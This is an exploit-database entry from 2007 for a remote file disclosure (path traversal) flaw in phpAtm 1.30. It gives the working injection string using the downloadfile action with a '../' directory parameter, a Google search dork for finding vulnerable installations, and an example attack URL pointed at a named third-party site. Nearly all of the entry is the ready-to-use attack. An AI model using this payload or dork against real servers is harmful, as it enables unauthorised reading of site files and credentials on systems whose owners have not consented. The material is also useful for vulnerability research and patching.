id: 1870
date: 05/12/2007
title: phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability
author: Ali.Mohajem
cves: 

===============================================================
phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability
===============================================================


******************************************************************************************
download page in : http://phpatm.free.fr/
 
bug in : phpatm
injection attack :
 index.php?action=downloadfile&filename=index.php&directory=../&
 
Dork in google : "powered by php advanced transfer manager"
 
example : http://www.furytech.net/phpATM_130/index.php?action=downloadfile&filename=index.php&directory=../
*******************************************************************************************



#  0day.today [2023-03-24]  #